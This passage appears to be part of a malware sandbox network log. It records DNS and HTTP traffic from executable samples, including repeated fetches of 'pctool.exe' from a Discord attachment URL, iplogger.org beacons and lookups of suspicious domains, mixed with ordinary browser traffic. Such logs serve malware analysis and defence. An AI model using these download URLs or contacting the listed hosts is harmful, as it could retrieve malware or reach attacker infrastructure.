                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBd0lj2lAkesOm9NOipBiFyMzGlx0bwGMtoebENnEmornq9o%2FALpYonD7nf35X9fz%2FD%2BLJ2%2BihVId1vH7hpaFz2E8ApjHo6BZmULuB7%2F5X0Dw%2BUk1%2B%2FE6Aaeg98t%2Bd65B5DoIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Set-Cookie: _cfuvid=cV.ItA4ZktCQfk19T3LpelsNAsYRfKiE1XqKAAMlfsU-1730917605860-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                              Server: cloudflare
                              CF-RAY: 8de7223c2ca46373-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe
                              Tue20abd30733a17.exe
                              Remote address:
                              162.159.135.233:443
                              Request
                              GET /attachments/897184039432257628/900114690296914032/pctool.exe HTTP/1.1
                              Host: cdn.discordapp.com
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Wed, 06 Nov 2024 18:26:50 GMT
                              Content-Type: text/plain;charset=UTF-8
                              Content-Length: 36
                              Connection: keep-alive
                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                              Set-Cookie: __cf_bm=5LK7Lz4.QOtQrqFKD6jEelePYUIlT0IsVBexbvh4dAM-1730917610-1.0.1.1-scOP5Pup046.cLpfZ4jeD7DLiizM8mAnMNmVod0z.1Cehv84c9KOATYXMs3uyutBWESigsGy04HKILyCEW59zQ; path=/; expires=Wed, 06-Nov-24 18:56:50 GMT; domain=.discordapp.com; HttpOnly; Secure
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xjvKcsMn9%2Bs75TxJ2ZZE0cFaBmCaVqee4W5okBmBg%2Ftc8Pqip%2FVCzBiSG75TvZstIqY80j4yo%2Few2EJa4DWWsMho2rsfcN47wJfdN%2Fc7LqkC509Y%2BsV8QAGJ2gEEW6tfkqHpNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Set-Cookie: _cfuvid=nIKRR100v8Y1umt3_X02.dM3xBr6iVpZYx7VW9.n.KI-1730917610935-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                              Server: cloudflare
                              CF-RAY: 8de7225c4b9a6373-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe
                              Tue20abd30733a17.exe
                              Remote address:
                              162.159.135.233:443
                              Request
                              GET /attachments/897184039432257628/900114690296914032/pctool.exe HTTP/1.1
                              Host: cdn.discordapp.com
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Wed, 06 Nov 2024 18:26:56 GMT
                              Content-Type: text/plain;charset=UTF-8
                              Content-Length: 36
                              Connection: keep-alive
                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                              Set-Cookie: __cf_bm=ghkMUqNPhW5YXdzNwDo6cpsCAH1xOLTKj3fY98POi6A-1730917616-1.0.1.1-4HM3ZAMV2C3arsRcFx2xPSos8MJH.AymT_ii692s4lCU.xhS0DV8iVsxuoiisaiihLkCvYAbUlWOgmlS9esgrw; path=/; expires=Wed, 06-Nov-24 18:56:56 GMT; domain=.discordapp.com; HttpOnly; Secure
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6m45mIUgqY32iKauHMbWQKd0BVphZ7O0MzSEFpkv131%2Fzc5dvGHJDxzJTQTr3IxiTQruWu%2Fx%2BYs2ubuaKO51nKwnvwVgJCIHPaCRVpdhWrkLodgKb90ayrxU68fmlhvq1I%2FHhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Set-Cookie: _cfuvid=vBk51Olo.KNDmRCUOZhByFT887RzOhBdfGL_GBg7UtM-1730917616001-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                              Server: cloudflare
                              CF-RAY: 8de7227bed8d6373-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe
                              Tue20abd30733a17.exe
                              Remote address:
                              162.159.135.233:443
                              Request
                              GET /attachments/897184039432257628/900114690296914032/pctool.exe HTTP/1.1
                              Host: cdn.discordapp.com
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Wed, 06 Nov 2024 18:27:01 GMT
                              Content-Type: text/plain;charset=UTF-8
                              Content-Length: 36
                              Connection: keep-alive
                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                              Set-Cookie: __cf_bm=c2NbO_GbZok1coknD8od3R.JbkDsvjyetBzAdGhHeTc-1730917621-1.0.1.1-sqGk4B5sXj5IVMtG7fQERSjtsEZbpv6K0p2RZFPewU2Ke2nsG5Pw7xbLm0Las8gSUQvf877ClcpdvT7hqrcZ_w; path=/; expires=Wed, 06-Nov-24 18:57:01 GMT; domain=.discordapp.com; HttpOnly; Secure
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2Bp%2Fha06H%2FpM7cNdJZ3GYJ1MgxhhfwA%2BDv5opffn1Iuyth9qAmGiZOSbg6M8Plqz%2FArwf7z9VIBRlbOe75UJXKzafiMVMZ27Kuu5XHDsRVg1KlDMm627%2BVbxrlGHWOoixpFSzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Set-Cookie: _cfuvid=rdacwISqC3jYGMYcSctFRQLlFV4yOrqxuotiRKhoMmI-1730917621102-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                              Server: cloudflare
                              CF-RAY: 8de7229baad76373-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe
                              Tue20abd30733a17.exe
                              Remote address:
                              162.159.135.233:443
                              Request
                              GET /attachments/897184039432257628/900114690296914032/pctool.exe HTTP/1.1
                              Host: cdn.discordapp.com
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Wed, 06 Nov 2024 18:27:06 GMT
                              Content-Type: text/plain;charset=UTF-8
                              Content-Length: 36
                              Connection: keep-alive
                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                              Set-Cookie: __cf_bm=ntatsx7IZqYyXZnkjl_BjCVrLdkqnrcM7LhpChwjrEk-1730917626-1.0.1.1-vIE62fRfYlbWg1igP3uBFO3u.pYQjwefjwsif6PDLVGGL3cuMUL74ADSBt.nmcp2jQM8rPdqadRuNhpVBUHwGQ; path=/; expires=Wed, 06-Nov-24 18:57:06 GMT; domain=.discordapp.com; HttpOnly; Secure
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gCEURCmO4SY1PTQIiuyFXWUf9jtrnQZxBAnvpU97K8YOhByNpa1QzeB5VgOoXgHEe8nPfDzcH6O7gFk86CjeO0BI4Br8DW%2BgEA7rBxQJBz7h7TETQfO9mcKktYl36LiZXrslIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Set-Cookie: _cfuvid=594OT1e9mfcMHuuZzp0aEHVlAbVmM4xbcsU_rv4rlX0-1730917626236-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                              Server: cloudflare
                              CF-RAY: 8de722bb7ded6373-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              DNS
                              all-mobile-pa1ments.com.mx
                              Tue203dd57461.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              all-mobile-pa1ments.com.mx
                              IN A
                              Response
                            • flag-us
                              DNS
                              buy-fantasy-football.com.sg
                              Tue203dd57461.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              buy-fantasy-football.com.sg
                              IN A
                              Response
                            • flag-us
                              DNS
                              t.gogamec.com
                              Tue20ea834764a6.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              t.gogamec.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              topniemannpickshop.cc
                              Tue203dd57461.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              topniemannpickshop.cc
                              IN A
                              Response
                            • flag-us
                              DNS
                              233.135.159.162.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              233.135.159.162.in-addr.arpa
                              IN PTR
                              Response
                            • flag-us
                              DNS
                              iplogger.org
                              Tue2095db5b6bd7.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              iplogger.org
                              IN A
                              Response
                              iplogger.org
                              IN A
                              104.26.3.46
                              iplogger.org
                              IN A
                              172.67.74.161
                              iplogger.org
                              IN A
                              104.26.2.46
                            • flag-us
                              GET
                              https://iplogger.org/1a2jd7
                              Tue203dd57461.exe
                              Remote address:
                              104.26.3.46:443
                              Request
                              GET /1a2jd7 HTTP/1.1
                              User-Agent: Tu10/19/2021
                              Host: iplogger.org
                              Connection: Keep-Alive
                              Response
                              HTTP/1.1 403 Forbidden
                              Date: Wed, 06 Nov 2024 18:26:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 7687
                              Connection: close
                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                              Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                              Cross-Origin-Embedder-Policy: require-corp
                              Cross-Origin-Opener-Policy: same-origin
                              Cross-Origin-Resource-Policy: same-origin
                              Origin-Agent-Cluster: ?1
                              Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                              Referrer-Policy: same-origin
                              X-Content-Options: nosniff
                              X-Frame-Options: SAMEORIGIN
                              cf-mitigated: challenge
                              cf-chl-out: EfJi6hFUmAlOIFCCd0ff2Aexqtkdhz0TxLUyK4d/J6Ivj9ozexr4nC2js+Fri3cF9CDP+ELUnY0pqzhBtdh0oxAxtadB2f1LfPlnQXJH/iJ6NnwR1C9470oGOtAkjQQPJm5d/5N5urGqYeCOj1+mHA==$4XiTL/MVDoQa7ywjUxLMdw==
                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AUtcINtqs18V7XlZGj0C%2Ftt01hik5EFSsn3%2FYTDC8pTQ22dPISZNfctOPlCJPLkOuBwZH0lYLXtXq2FydsO6A8rnBif8Qqrq5pz6SexHUTYzcVVydte9opi2fXSvSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8de7223f8f6f074a-MAN
                              server-timing: cfL4;desc="?proto=TCP&rtt=68127&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2989&recv_bytes=390&delivery_rate=64386&cwnd=253&unsent_bytes=0&cid=4796d55b2e4aa47f&ts=152&x=0"
                            • flag-us
                              DNS
                              propanla.com
                              Tue201d50e7015.tmp
                              Remote address:
                              8.8.8.8:53
                              Request
                              propanla.com
                              IN A
                              Response
                            • flag-us
                              GET
                              https://iplogger.org/1a3jd7
                              Tue203dd57461.exe
                              Remote address:
                              104.26.3.46:443
                              Request
                              GET /1a3jd7 HTTP/1.1
                              Host: iplogger.org
                              Response
                              HTTP/1.1 403 Forbidden
                              Date: Wed, 06 Nov 2024 18:26:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                              Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                              Cross-Origin-Embedder-Policy: require-corp
                              Cross-Origin-Opener-Policy: same-origin
                              Cross-Origin-Resource-Policy: same-origin
                              Origin-Agent-Cluster: ?1
                              Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                              Referrer-Policy: same-origin
                              X-Content-Options: nosniff
                              X-Frame-Options: SAMEORIGIN
                              cf-mitigated: challenge
                              cf-chl-out: JSZKT2r5iMoOf1O+jQ6hruMxIHxTT5kAKlZB5XilXe59iIYx7bYWHQ0Ddkc3ZLqGcQrG35ADOhwA/TnRBgbOT7JEeZDwy7ubhMrhB+B35ZLgO0tzAAYxgIT5br9/o/LBTfp3yIQTPD19Kox0Ecy8Kw==$IOYVsglbN2GSPDOqcnOy4A==
                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mhFadnuWr%2FJG2%2BwMtDwSdHj%2BtMOZu7%2FEmkEza98wY0206AEn6JISHIAN4ScHtmt7bZNTi7l%2BIBASobUd0xfVFQ1i80z4J68EBykZKOtTD5C76FEJzgnoWmkNehBDGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8de72240de3b45a1-LHR
                              server-timing: cfL4;desc="?proto=TCP&rtt=41799&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2989&recv_bytes=532&delivery_rate=96193&cwnd=253&unsent_bytes=0&cid=684a6514f85f0f5b&ts=108&x=0"
                            • flag-us
                              DNS
                              46.3.26.104.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              46.3.26.104.in-addr.arpa
                              IN PTR
                              Response
                            • flag-us
                              DNS
                              telegatt.top
                              Tue200ab8d408d.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              telegatt.top
                              IN A
                              Response
                            • flag-us
                              DNS
                              gcl-gb.biz
                              Tue2082eedf21.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              gcl-gb.biz
                              IN A
                              Response
                            • flag-us
                              DNS
                              241.150.49.20.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              241.150.49.20.in-addr.arpa
                              IN PTR
                              Response
                            • flag-us
                              DNS
                              t.gogamec.com
                              Tue20ea834764a6.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              t.gogamec.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              GET
                              https://iplogger.org/1mxKf7
                              Tue2095db5b6bd7.exe
                              Remote address:
                              104.26.3.46:443
                              Request
                              GET /1mxKf7 HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                              Host: iplogger.org
                              Cache-Control: no-cache
                              Response
                              HTTP/1.1 403 Forbidden
                              Date: Wed, 06 Nov 2024 18:26:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 8327
                              Connection: close
                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                              Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                              Cross-Origin-Embedder-Policy: require-corp
                              Cross-Origin-Opener-Policy: same-origin
                              Cross-Origin-Resource-Policy: same-origin
                              Origin-Agent-Cluster: ?1
                              Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                              Referrer-Policy: same-origin
                              X-Content-Options: nosniff
                              X-Frame-Options: SAMEORIGIN
                              cf-mitigated: challenge
                              cf-chl-out: bxnqwUq3brHaYhjZwH80+mfv6IyLqLVyv/6EGYSpfk6XRlRa1CpiqMI3EyK8stbcwU/ro5UvqxpbGoBQ8+edPQ637xCIm9vPq/rZ04r+2gBHO8zYF1jeaiVeV1s9uDqFO/HqHunYJ3FZ2vtE0c/QKQ==$oSfDrIAuXqNzCtSfq/bOeA==
                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIWXf7%2FW8DgUBKy6tl5At3OimGS%2Bt2ewF2WBXDDBkcd9diGq4AbGpz84iawU9iPtRWUnCLeX7c%2BG5h4DIrCA7FUUx5wXd4N0b%2FH2UjylkPVLpXsr9yVU5bLeD1B8Nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8de7226b0ed777a0-LHR
                              server-timing: cfL4;desc="?proto=TCP&rtt=41477&sent=5&recv=9&lost=0&retrans=0&sent_bytes=3284&recv_bytes=497&delivery_rate=96806&cwnd=253&unsent_bytes=0&cid=471ce4ef2be33d71&ts=1693&x=0"
                            • flag-us
                              DNS
                              c.pki.goog
                              Tue2095db5b6bd7.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              c.pki.goog
                              IN A
                              Response
                              c.pki.goog
                              IN CNAME
                              pki-goog.l.google.com
                              pki-goog.l.google.com
                              IN A
                              142.250.187.227
                            • flag-gb
                              GET
                              http://c.pki.goog/r/gsr1.crl
                              Tue2095db5b6bd7.exe
                              Remote address:
                              142.250.187.227:80
                              Request
                              GET /r/gsr1.crl HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Microsoft-CryptoAPI/10.0
                              Host: c.pki.goog
                              Response
                              HTTP/1.1 200 OK
                              Accept-Ranges: bytes
                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                              Cross-Origin-Resource-Policy: cross-origin
                              Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                              Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                              Content-Length: 1739
                              X-Content-Type-Options: nosniff
                              Server: sffe
                              X-XSS-Protection: 0
                              Date: Wed, 06 Nov 2024 17:54:28 GMT
                              Expires: Wed, 06 Nov 2024 18:44:28 GMT
                              Cache-Control: public, max-age=3000
                              Age: 1944
                              Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
                              Content-Type: application/pkix-crl
                              Vary: Accept-Encoding
                            • flag-gb
                              GET
                              http://c.pki.goog/r/r4.crl
                              Tue2095db5b6bd7.exe
                              Remote address:
                              142.250.187.227:80
                              Request
                              GET /r/r4.crl HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Microsoft-CryptoAPI/10.0
                              Host: c.pki.goog
                              Response
                              HTTP/1.1 200 OK
                              Accept-Ranges: bytes
                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                              Cross-Origin-Resource-Policy: cross-origin
                              Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                              Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                              Content-Length: 436
                              X-Content-Type-Options: nosniff
                              Server: sffe
                              X-XSS-Protection: 0
                              Date: Wed, 06 Nov 2024 17:54:28 GMT
                              Expires: Wed, 06 Nov 2024 18:44:28 GMT
                              Cache-Control: public, max-age=3000
                              Age: 1945
                              Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                              Content-Type: application/pkix-crl
                              Vary: Accept-Encoding
                            • flag-us
                              DNS
                              227.187.250.142.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              227.187.250.142.in-addr.arpa
                              IN PTR
                              Response
                              227.187.250.142.in-addr.arpa
                              IN PTR
                              lhr25s34-in-f31e100net
                            • flag-us
                              DNS
                              telegatt.top
                              Tue200ab8d408d.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              telegatt.top
                              IN A
                              Response
                            • flag-us
                              DNS
                              t.gogamec.com
                              Tue20ea834764a6.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              t.gogamec.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              gcl-gb.biz
                              Tue2082eedf21.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              gcl-gb.biz
                              IN A
                              Response
                            • flag-us
                              DNS
                              www.iyiqian.com
                              Tue2095db5b6bd7.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              www.iyiqian.com
                              IN A
                              Response
                              www.iyiqian.com
                              IN A
                              13.251.16.150
                            • flag-sg
                              GET
                              http://www.iyiqian.com/
                              Tue2095db5b6bd7.exe
                              Remote address:
                              13.251.16.150:80
                              Request
                              GET / HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                              Host: www.iyiqian.com
                              Cache-Control: no-cache
                              Response
                              HTTP/1.1 200 OK
                              Server: nginx
                              Date: Wed, 06 Nov 2024 18:27:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=; path=/; domain=.www.iyiqian.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=; path=/; domain=www.iyiqian.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=d89594c841aff5bf0af07e81d1f7e20c|138.199.29.44|1730917619|1730917619|0|1|0; path=/; domain=.iyiqian.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=138.199.29.44; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              t.gogamec.com
                              Tue20ea834764a6.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              t.gogamec.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              150.16.251.13.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              150.16.251.13.in-addr.arpa
                              IN PTR
                              Response
                              150.16.251.13.in-addr.arpa
                              IN PTR
                              ec2-13-251-16-150ap-southeast-1compute amazonawscom
                            • flag-us
                              DNS
                              telegatt.top
                              Tue200ab8d408d.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              telegatt.top
                              IN A
                              Response
                            • flag-us
                              DNS
                              www.google.com
                              chrome.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              www.google.com
                              IN A
                              Response
                              www.google.com
                              IN A
                              142.250.179.228
                            • flag-gb
                              GET
                              https://www.google.com/async/ddljson?async=ntp:2
                              chrome.exe
                              Remote address:
                              142.250.179.228:443
                              Request
                              GET /async/ddljson?async=ntp:2 HTTP/2.0
                              host: www.google.com
                              sec-fetch-site: none
                              sec-fetch-mode: no-cors
                              sec-fetch-dest: empty
                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                              accept-encoding: gzip, deflate, br, zstd
                              accept-language: en-US,en;q=0.9
                            • flag-gb
                              GET
                              https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                              chrome.exe
                              Remote address:
                              142.250.179.228:443
                              Request
                              GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                              host: www.google.com
                              x-client-data: CIvdygE=
                              sec-fetch-site: cross-site
                              sec-fetch-mode: no-cors
                              sec-fetch-dest: empty
                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                              accept-encoding: gzip, deflate, br, zstd
                              accept-language: en-US,en;q=0.9
                            • flag-gb
                              GET
                              https://www.google.com/async/newtab_promos
                              chrome.exe
                              Remote address:
                              142.250.179.228:443
                              Request
                              GET /async/newtab_promos HTTP/2.0
                              host: www.google.com
                              sec-fetch-site: cross-site
                              sec-fetch-mode: no-cors
                              sec-fetch-dest: empty
                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                              accept-encoding: gzip, deflate, br, zstd
                              accept-language: en-US,en;q=0.9
                            • flag-us
                              DNS
                              3.180.250.142.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              3.180.250.142.in-addr.arpa
                              IN PTR
                              Response
                              3.180.250.142.in-addr.arpa
                              IN PTR
                              lhr25s32-in-f31e100net
                            • flag-us
                              DNS
                              202.212.58.216.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              202.212.58.216.in-addr.arpa
                              IN PTR
                              Response
                              202.212.58.216.in-addr.arpa
                              IN PTR
                              ams16s21-in-f101e100net
                              202.212.58.216.in-addr.arpa
                              IN PTR
                              lhr25s27-in-f10�I
                              202.212.58.216.in-addr.arpa
                              IN PTR
                              ams16s21-in-f202�I
                            • flag-us
                              DNS
                              228.179.250.142.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              228.179.250.142.in-addr.arpa
                              IN PTR
                              Response
                              228.179.250.142.in-addr.arpa
                              IN PTR
                              lhr25s31-in-f41e100net
                            • flag-us
                              DNS
                              ogads-pa.googleapis.com
                              chrome.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              ogads-pa.googleapis.com
                              IN A
                              Response
                              ogads-pa.googleapis.com
                              IN A
                              142.250.187.234
                              ogads-pa.googleapis.com
                              IN A
                              172.217.169.10
                              ogads-pa.googleapis.com
                              IN A
                              216.58.212.202
                              ogads-pa.googleapis.com
                              IN A
                              172.217.169.42
                              ogads-pa.googleapis.com
                              IN A
                              142.250.200.42
                              ogads-pa.googleapis.com
                              IN A
                              142.250.179.234
                              ogads-pa.googleapis.com
                              IN A
                              142.250.180.10
                              ogads-pa.googleapis.com
                              IN A
                              172.217.16.234
                              ogads-pa.googleapis.com
                              IN A
                              216.58.204.74
                              ogads-pa.googleapis.com
                              IN A
                              172.217.169.74
                              ogads-pa.googleapis.com
                              IN A
                              216.58.201.106
                              ogads-pa.googleapis.com
                              IN A
                              142.250.200.10
                              ogads-pa.googleapis.com
                              IN A
                              142.250.187.202
